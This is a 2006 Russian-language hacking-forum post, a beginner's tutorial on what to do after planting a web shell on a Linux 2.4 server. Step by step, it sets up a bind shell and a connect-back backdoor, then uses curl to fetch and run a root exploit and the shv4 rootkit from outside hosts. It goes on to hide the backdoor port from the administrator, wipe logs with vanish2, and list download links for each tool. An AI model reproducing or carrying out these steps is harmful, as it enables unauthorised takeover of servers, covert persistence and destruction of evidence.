ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

R00t me №1
  #1  
Старый 12.04.2006, 19:36
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию R00t me №1

Решил написать статейку для расширения кругозора новичков античата в целом.
Думаю, она многим понадобится и даст маленький толчок в дальнейшем развитии.
Статья предназначена для тех, кто уже умеет заливать веб-шелл и ознакомлен со всеми его прелестями...
Итак – мы залили шелл. Что же делать дальше?

Отдаём первую команду:
Код:
uname –a
Что же мы видим?
Linux nalog.com 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
Ядро старо,как мир.Нашей задачей будет поднять свои привилегии до максимальных aka root.Описание взлома всех версий линуксов,фрях,ect описать не реально-так что в этой статье будем говорить исключительно о Linux 2.4.20-8.
Погнали)
Для начала проделаем следующие шаги:
1)
Код:
 cd /tmp
 mkdir logs
 cd logs
2)Cливаем: bind.pl
Код:
chmod +x bind.pl
perl bind.pl
Запускаем: netcat
Код:
nc sitename 32767
Где sitename -ваш сайт.
При открытии окна командуем: id.Работает?
Отлично)
Но межет и не работать если фаер фильтрует соединение(
Тогда скачиваем
Connect-Back Backdoor (bd.c)
Код:
chmod +x bd.c
gcc db.c –o bd
После чего ставим netcat на прослушку 4000-ого порта:
Код:
-l –p 4000
И запускаем бекдор:
Код:
./db 127.0.0.1

Где 127.0.0.1 ваш реальный ip.
И вот в окошке появилась надпись - Connected to CommandLine...
Приступим к решительным действиям:
Скачиваем сплойт для этой версии ядра-вполне должен подойти
mremap_pte,но я советую воспользоваться xpl_brk ,т.к он меня редко подводил.
Скачиваем уже cкомпилированный сплойт:
Код:
curl  http://xpl.netmisphere2.com/xpl_brk 
chmod +x  xpl_brk
./ xpl_brk
id 
uid=0(root) gid=0(root)
Отлично.Мы добись того чего хотели,но это только пол дела.

Надо закрепиться в системе для этого скачиваем руткит-возьмём shv4
Код:
curl http://splo1t.narod.ru/rootkits/shv4.tar.gz
tar xzf shv4.tar.gz
cd shv4
chmod +x setup
./setup pass  4321
*где pass(пароль) и 4321(порт) ваши значения. Во избежание проблем не советую вешать на высокий порт.
Заходит в putty указываем сайт, порт и конектимся.
Имя root,а пароль тот что вы указали при настройке. В моём случае это pass.
Зашли?

Выполняем команду:
Код:
nestat -an
Как видите заданный порт не где не светится,а значит мы освободили себя от зоркого глаза админа
Осталось, почистить логи.
Скачиваем один из лучших клинеров под *nix
-vanish2
Код:
chmod +x vanish2.
Собираем
Код:
 gcc vanish2.c –o vanish
Запускаем:
Код:
./vanish root name_site 127.0.0.1
*Где 127.0.0.1 ваш реальный ip.
Видим надпись:
V_A_N_I_S_H_E_D_! Которая не может не радовать глаз.
_ _ _ _ _ _ _ _ _ _ _ _ _ _
На этом моя статейка кончается-надеюсь она поможет новичкам...
Ссылки:
r57Shell: http://hcr.3dn.ru/expl/php/r57shell.txt
Netcat:http://pro-hack.ru/download/s_nettools_2.html
bind.pl: http://nsd.ru/soft/1/ano/bind.pl.txt
Connect-Back Backdoor: http://desrow.narod.ru/www/bd.rar
xpl_brk: http://desrow.narod.ru/exploits/xpl_brk.rar
shv4: http://desrow.narod.ru/rootkits/shv4_.rar
Putty: http://pro-hack.ru/download/s_nettools_4.html
vanish2: http://nsd.ru/soft/1/anonimus/vanish2.tgz
For any link pass:antichat
=====[ Desr0w | | 12.04.2006 ]=====

Последний раз редактировалось Desr0w; 02.08.2008 в 17:14..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Делаю аваторы на заказ.На халяву! Sn_key Болталка 308 05.09.2005 12:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ